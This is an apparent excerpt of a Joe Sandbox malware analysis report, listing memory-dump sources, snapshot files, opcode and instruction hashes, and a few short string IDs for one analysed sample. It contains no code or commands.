                                                                  • API String ID: 0-2005406323
                                                                  • Opcode ID: 3563ad75c9ee14bf9104dec71c595135613fb1cbad9cb79c782fa985886f807c
                                                                  • Instruction ID: 3c9735dd332fbde748c1a5acd574038734c52f9ce5f8a2be02b835a783de5ca6
                                                                  • Opcode Fuzzy Hash: 3563ad75c9ee14bf9104dec71c595135613fb1cbad9cb79c782fa985886f807c
                                                                  • Instruction Fuzzy Hash: 465115B4E012189FDB15CFA9D484B9DFBF2BF88310F248129E819EB350EB749945CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (q
                                                                  • API String ID: 0-2414175341
                                                                  • Opcode ID: cc1d7d61a69b39493e2508a3738c731487740de782be22439b6743ebe0a9e05c
                                                                  • Instruction ID: 9900891d52f2b2d229ce196f033fa92851687fffe64186e15db120fb09d2835d
                                                                  • Opcode Fuzzy Hash: cc1d7d61a69b39493e2508a3738c731487740de782be22439b6743ebe0a9e05c
                                                                  • Instruction Fuzzy Hash: 8F411A74B042158FDB18DF64D558BADBBF2BF8D610F1580A9E846AB391DA31DD02CB60
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRq
                                                                  • API String ID: 0-3187445251
                                                                  • Opcode ID: eaae2062768a6e5c65ef78912aaa0ce5edeae640172100098ca9a2d9b9a4138c
                                                                  • Instruction ID: 976220a99f70f61ed7a38a990bd339dd41d33c6d27cda7337a60a88f39bfb65b
                                                                  • Opcode Fuzzy Hash: eaae2062768a6e5c65ef78912aaa0ce5edeae640172100098ca9a2d9b9a4138c
                                                                  • Instruction Fuzzy Hash: BA415E74B10214DFCB58DF29D499EAD7BF2BF88710B1485A9E402EB360CB309C41CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: LRq
                                                                  • API String ID: 0-3187445251
                                                                  • Opcode ID: c2cf5fab32621f78bb5d8008d1d41595f8aedc950a9e1194ba4d1c5888ff3fef
                                                                  • Instruction ID: 335318e287e516186c299645fab7f81c3f96f17f5200d7e7bdc5de5092a637d5
                                                                  • Opcode Fuzzy Hash: c2cf5fab32621f78bb5d8008d1d41595f8aedc950a9e1194ba4d1c5888ff3fef
                                                                  • Instruction Fuzzy Hash: 9D411A74B10214DFDB58DF69D858AAE7BF2BF89711B1084A9E406EB360DB71EC41CB90
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7
                                                                  • API String ID: 0-2005406323
                                                                  • Opcode ID: 096b5851c0630027c80986338fe90fd95d7ba611be469f7fb673577d97a27f3c
                                                                  • Instruction ID: aecd8d5c3a73cf83f064f79fa42c054d9ccec767f246f1fceaacb409b569666a
                                                                  • Opcode Fuzzy Hash: 096b5851c0630027c80986338fe90fd95d7ba611be469f7fb673577d97a27f3c
                                                                  • Instruction Fuzzy Hash: CF31BC75D01724EFDF18CF69E116BA9BBF2FB48334F14812AD819A7344C3781A648B91
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 7
                                                                  • API String ID: 0-2005406323
                                                                  • Opcode ID: 28beaa3edf6d71c4cba1de08d97a120fb5cb97882c23db03683ccfb7876098e8
                                                                  • Instruction ID: 26dd20d15b0fdf54e84b9d64d54980b80ee3dd418f836ebf2f0c6f682648c8f2
                                                                  • Opcode Fuzzy Hash: 28beaa3edf6d71c4cba1de08d97a120fb5cb97882c23db03683ccfb7876098e8
                                                                  • Instruction Fuzzy Hash: 6C2198B0806768EFDB14CF69E556B99BBF6FB48334F14802AD849A3340C3781A64CB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ac92080ad32c22ed0eae579b61ef7f71510c58e921d3b48addf54ee60c5fb10
                                                                  • Instruction ID: fc2e3799e177138f45373c3e40d11d3d1d781004d5ef1c0442f27e03cb15b645
                                                                  • Opcode Fuzzy Hash: 5ac92080ad32c22ed0eae579b61ef7f71510c58e921d3b48addf54ee60c5fb10
                                                                  • Instruction Fuzzy Hash: 8791DD74A042459FCB09CF58C494EAAFBF1FF48310B24859AD951EB3A1C736EC91CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 250e4fe6ce933bca9d06b102f4aca69f66be981948b9d222d549a8c535d7c413
                                                                  • Instruction ID: 61633e5a2570f6dbd663f11bf2790abfcc829826fd16802f54ab8ea37db13b0d
                                                                  • Opcode Fuzzy Hash: 250e4fe6ce933bca9d06b102f4aca69f66be981948b9d222d549a8c535d7c413
                                                                  • Instruction Fuzzy Hash: 5B5119313082198FDB18DB35E954E7A7BE6FFC9254B1485AAE415CB392DB31DC02CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ef44fbebe2e0db6b74578ab5d949865d87762ae5d4fc8da21986d8e319250e8b
                                                                  • Instruction ID: 0398dd1921538204922eaa11dbfb8b3a400f1e5e94873cf8442e95a1b8d4638d
                                                                  • Opcode Fuzzy Hash: ef44fbebe2e0db6b74578ab5d949865d87762ae5d4fc8da21986d8e319250e8b
                                                                  • Instruction Fuzzy Hash: 1351E074B043699FDB14DBB98850ABFBBF6BF85200B0488ADD456DB351DB34E901CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fef9a230ed1b66176d01296cf207c59fb084368c4fb1b3ba5298146747a75fd5
                                                                  • Instruction ID: 340fab88007644a555306c6bf27b8220969f14d0e907c5517740d1f321ca29d5
                                                                  • Opcode Fuzzy Hash: fef9a230ed1b66176d01296cf207c59fb084368c4fb1b3ba5298146747a75fd5
                                                                  • Instruction Fuzzy Hash: A7415874A00215DFCB09CF59C494EBAFBB1FF48310B218199D956AB364C736EC91CBA4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 05d609f679fe984d13fb651e6778edf40701af474e9b976717738dad45deabac
                                                                  • Instruction ID: efc696740233aa4a35403c06e86ed433fbd1ef4e4410e9aaa2c62164b43ac9c0
                                                                  • Opcode Fuzzy Hash: 05d609f679fe984d13fb651e6778edf40701af474e9b976717738dad45deabac
                                                                  • Instruction Fuzzy Hash: 9D413B74A042558FDB19DF64C598AE9BFF2BF8A310F198099E846AB361DB359C01CB60
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8df2d9613273ca5984935c712d14e7b8958d66880ea77e77396327f635a9df5a
                                                                  • Instruction ID: 0f8ac2e3e2de46a98de10c07229dda4938b0de9ff449a891a856d8f94605b0fc
                                                                  • Opcode Fuzzy Hash: 8df2d9613273ca5984935c712d14e7b8958d66880ea77e77396327f635a9df5a
                                                                  • Instruction Fuzzy Hash: D6319E35301701AFD719EB78E854B9AB7E6BFC4621F108529D50ACF360DB74AC06CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7be923f93b50d2bf4f6b25c5697a3a11e3d12ca7788d5568f542b02243197dc1
                                                                  • Instruction ID: 83f7635bf1d88fd7edc0b8b2028d3440238ba94f5e5a2c84e19cab4f1012e292
                                                                  • Opcode Fuzzy Hash: 7be923f93b50d2bf4f6b25c5697a3a11e3d12ca7788d5568f542b02243197dc1
                                                                  • Instruction Fuzzy Hash: F2314FB0F01219AFDF18DF69C494BAEBBF6BF88250F148029E505EB351EB759C418B51
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2122883fcb33c503c5a7e124ec724730de387481027f70596dd3972b8f8fe6a
                                                                  • Instruction ID: 163041e9a97d989af3ddd3cdff24f17356dabc6450b11501c2bacedcc7c3e366
                                                                  • Opcode Fuzzy Hash: c2122883fcb33c503c5a7e124ec724730de387481027f70596dd3972b8f8fe6a
                                                                  • Instruction Fuzzy Hash: E7316BB0F01219AFDF08DF69C494BAEBBF6BF88250F148029E501EB350EB349C018B61
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d2f020c7b999a044077c7ae3c45d3a6ef50a0c188f8fcbd4661f6818d5d82441
                                                                  • Instruction ID: 12ab3fe91d5084f0429663d00d58811adfe8211e30d9191bf8a76dcf08fcf8fc
                                                                  • Opcode Fuzzy Hash: d2f020c7b999a044077c7ae3c45d3a6ef50a0c188f8fcbd4661f6818d5d82441
                                                                  • Instruction Fuzzy Hash: 7B218D706083659FCF15CBB5C8509BEBBF6AF8620170504ADE492CB662DB34D905CBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0aa7b4ff63b8b2ff616f79946834e676352cad500b937130196d903b2fd942ae
                                                                  • Instruction ID: 1d57b62f70b62cf48ce88e232b72eddd938bc190e2b1dcc04923ed1c0a9887a8
                                                                  • Opcode Fuzzy Hash: 0aa7b4ff63b8b2ff616f79946834e676352cad500b937130196d903b2fd942ae
                                                                  • Instruction Fuzzy Hash: C9214B312093889FCB0A8B74A45596D7FF1EF4612475408EFD486CF663CB219C06C7A1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1713099624.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_35ad000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 956b04bebe7bbf34594cb51a46310049ccfab1d2b432b22577490941651e6143
                                                                  • Instruction ID: cd8a24815018ba93300950e9eb5476f26491e17a87c158d0c6bd2aa647d0831e
                                                                  • Opcode Fuzzy Hash: 956b04bebe7bbf34594cb51a46310049ccfab1d2b432b22577490941651e6143
                                                                  • Instruction Fuzzy Hash: A5212771904700EFDF05CF54E9C1B2ABB65FB84314F24C5A9E9090F266C336D416DBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e5d7a40c462c3540fabf8357d1d6617c05990a438741436fa7822dd73fdbea2
                                                                  • Instruction ID: 35b5efc428dd91cce02dd508a6c393bf2253940d2d805d59ef1edeb4ebdc0c72
                                                                  • Opcode Fuzzy Hash: 0e5d7a40c462c3540fabf8357d1d6617c05990a438741436fa7822dd73fdbea2
                                                                  • Instruction Fuzzy Hash: FF212876504240DFEF15DF10E9C0B26BBF5FB84314F2489A9E8050B266C336D466CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c706076c25968a9a597a71cb1a20bdf3c7c016bc038e607fd064a774bfcd0048
                                                                  • Instruction ID: f84ae8876005ad2a87c331f2530b4cb7aef72b1362669fb9d1b3eeb95003dd5e
                                                                  • Opcode Fuzzy Hash: c706076c25968a9a597a71cb1a20bdf3c7c016bc038e607fd064a774bfcd0048
                                                                  • Instruction Fuzzy Hash: 4F111C39B002288FDB14DB68E844EED77F6FFC8611B0040A9E509DB314DB35DC128B90
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 46d545f2bdbae0b987ed689b561bd36df7354bbaa569ca2fd7a433e61aabe659
                                                                  • Instruction ID: 5adac74891213cbc51856009d8f745c49d5f1043304456b4c692f9c0f5b0821c
                                                                  • Opcode Fuzzy Hash: 46d545f2bdbae0b987ed689b561bd36df7354bbaa569ca2fd7a433e61aabe659
                                                                  • Instruction Fuzzy Hash: 7F2151B4E01205AFDF04EFB8D4949ADBBF1FF99214B148999D405AB325DB35AE00CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1713099624.00000000035AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 035AD000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_35ad000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 310959a3e26c15ce7ac5ad811d77cc8c509762f85f9c3b5845d830cbd512957e
                                                                  • Instruction ID: 1b38d4794b53097f95935a1f3641e4aa79267667f975516174e874378b2efb29
                                                                  • Opcode Fuzzy Hash: 310959a3e26c15ce7ac5ad811d77cc8c509762f85f9c3b5845d830cbd512957e
                                                                  • Instruction Fuzzy Hash: 3321AC76904640DFCB16CF14E9C4B16BF62FB48314F28C5A9ED094B266C33AD42ADB91
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 45e6dfdec807e8dd175771cc9ad60eb4960d9b358768f53424e5db556221ae4a
                                                                  • Instruction ID: f4b60a37c6a8cdb1dcb533e112289a2ab6e229e739f5b785a10cd18863c5ee11
                                                                  • Opcode Fuzzy Hash: 45e6dfdec807e8dd175771cc9ad60eb4960d9b358768f53424e5db556221ae4a
                                                                  • Instruction Fuzzy Hash: 6111D376504280CFDB15CF14E5C4B26FFB1FB84324F28C5A9D8090B666C33AD466CBA2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d01ccd87f78d642a757ad1ad7cfac2cb51355f8715b53e032a4c18b4942bfcbe
                                                                  • Instruction ID: 192f81c57287611e13f9316b5a9297ad01a21e05e01ebf76032867c7d27a3537
                                                                  • Opcode Fuzzy Hash: d01ccd87f78d642a757ad1ad7cfac2cb51355f8715b53e032a4c18b4942bfcbe
                                                                  • Instruction Fuzzy Hash: 3D11C239700304AFD704DB68E8909BE77F6EFC921071449A9E805DF360DB35AD15C7A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 367e82bb97ccbfde01205a7df3471dcd71c26abccaddfe073cbfd7bf59d5cfd9
                                                                  • Instruction ID: 54905bd0554badbb545d8e5e149f53a24a35c5f10eda7e9bbf47e3dd5ed8bcf2
                                                                  • Opcode Fuzzy Hash: 367e82bb97ccbfde01205a7df3471dcd71c26abccaddfe073cbfd7bf59d5cfd9
                                                                  • Instruction Fuzzy Hash: 3D115178E00208AFDB04EFB8D9949ADBBF1FF89214B508995D405EB321DB30AE01CB40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ded03daa5611437fc15a2a6fde9346e9d2f8b309a1e98804ef6b4b889abeeabb
                                                                  • Instruction ID: 8ab70a15c9d4d5355ba775e73d6cdb95903ecd8a2dbfb34135cec243dd7e6ab0
                                                                  • Opcode Fuzzy Hash: ded03daa5611437fc15a2a6fde9346e9d2f8b309a1e98804ef6b4b889abeeabb
                                                                  • Instruction Fuzzy Hash: 53018039B00205AFD714EB68E8909AE77F6FBC961071089A9E805DF360DB75AD0587A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 71acdaec62120500f6909cb63acd04093c8fc861fab215759831332b5fead886
                                                                  • Instruction ID: a3b747c6fbf8c595b3bf6ee1dd3251f0d5a5b560796129f3affce1fedb6ea2d7
                                                                  • Opcode Fuzzy Hash: 71acdaec62120500f6909cb63acd04093c8fc861fab215759831332b5fead886
                                                                  • Instruction Fuzzy Hash: ED01C4316093448FD719CB35D455A657FF5FF49210B2988AAD05EC7661DB24A844C741
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 13e9b0601149e1baffa7d97243ab6716fa8c00c043e0755b1692c1d03d8f5775
                                                                  • Instruction ID: 2a455bd6835b43039a596c29ff3f673431d4c7164a7e643fbde5f0ae4778a8c8
                                                                  • Opcode Fuzzy Hash: 13e9b0601149e1baffa7d97243ab6716fa8c00c043e0755b1692c1d03d8f5775
                                                                  • Instruction Fuzzy Hash: 290128B260D2E04FEB064B68A8D09B6BFE4AFA611174841AEE491CB262C760C909C710
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24d2ccfbcf54db6651b632c22842143def53b2839c1d4a907dae756e7b40c01a
                                                                  • Instruction ID: 2cbe94bd9fc5aefc2ffb2211ee03280c26dadec8919a4edc1354b988c8e67166
                                                                  • Opcode Fuzzy Hash: 24d2ccfbcf54db6651b632c22842143def53b2839c1d4a907dae756e7b40c01a
                                                                  • Instruction Fuzzy Hash: 5101F771404300AEF720CE26D884B77FBE8FF41224F08845AED480F292D2799841CAB2
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1712812732.000000000351D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0351D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_351d000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1d7ff0825da9c1144f7c761dace6302b7fed834b04970a4fda9a268bdc1b08ef
                                                                  • Instruction ID: 692fef2d1d22126784780432ad99678a66584530a44a93c68bb7a3d4d5b04caf
                                                                  • Opcode Fuzzy Hash: 1d7ff0825da9c1144f7c761dace6302b7fed834b04970a4fda9a268bdc1b08ef
                                                                  • Instruction Fuzzy Hash: A901447140E3C05FE7128B259C94B52BFB4EF47224F1D81DBD9848F1A3D2695844C772
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 50ba95aa251b34bea022a9baf3a1f5cecc673ae7b51cc38fb9d44432dcd05553
                                                                  • Instruction ID: b1aefc92438805aec3b912e7a8e32362c2ccb1dfc1cc21ba7daa643770af93c9
                                                                  • Opcode Fuzzy Hash: 50ba95aa251b34bea022a9baf3a1f5cecc673ae7b51cc38fb9d44432dcd05553
                                                                  • Instruction Fuzzy Hash: 4FF0C235306255AFC7159B7DF810899BBA5EFC123531001BBD109C7311CB315E128BA5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 139cba050c8eaa994142da6baf397c78c56dc3972c53d13ac9e5839ed297e054
                                                                  • Instruction ID: 3d8dc18a68b58efd336d79ef4028762f4e904be84e6636a585464969053f4dc7
                                                                  • Opcode Fuzzy Hash: 139cba050c8eaa994142da6baf397c78c56dc3972c53d13ac9e5839ed297e054
                                                                  • Instruction Fuzzy Hash: EBF0F067B006305BCF185AB87A20BEAF7DA9B85070F0541B7E908E7701C9218D0443E1
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0f0da19f15827305015ee5eecb2fdc906411820e356c8cb91941a6b104f0f172
                                                                  • Instruction ID: 4b60154e3c7164a356c4deedab0895576333de2383d53cc2ba8ae5b90ec0a0a8
                                                                  • Opcode Fuzzy Hash: 0f0da19f15827305015ee5eecb2fdc906411820e356c8cb91941a6b104f0f172
                                                                  • Instruction Fuzzy Hash: 06F022317093A05FC7118A798C6497BBFE9EF8961070540BBF984C73A1DAB0CC0487A0
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b1c37126d82befba091974c17f4830dc2688a64331f3a87066a3cc1440e064cb
                                                                  • Instruction ID: cfc3782edc19dd3f45df68260095bb8f0e45ec09dcec5ab81da17e4df9de5231
                                                                  • Opcode Fuzzy Hash: b1c37126d82befba091974c17f4830dc2688a64331f3a87066a3cc1440e064cb
                                                                  • Instruction Fuzzy Hash: 73F0593210E370ABCB1E5759F825CA03FF4EA8123132941EBD49DDB242C52A0C0387A8
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b9f84009f99929006d65d212f421bf9d221d0180b60ad925a80ada308dbc1cd9
                                                                  • Instruction ID: ce827513316a34d475d6b3e0da404b08055694e2e7f556be0ee352f0661ba212
                                                                  • Opcode Fuzzy Hash: b9f84009f99929006d65d212f421bf9d221d0180b60ad925a80ada308dbc1cd9
                                                                  • Instruction Fuzzy Hash: 90F0C876106320EFCB059B24F019AE97FB1FB44379F104086D0495B382CB7D6A45C7D5
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1679632763.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_5a90000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
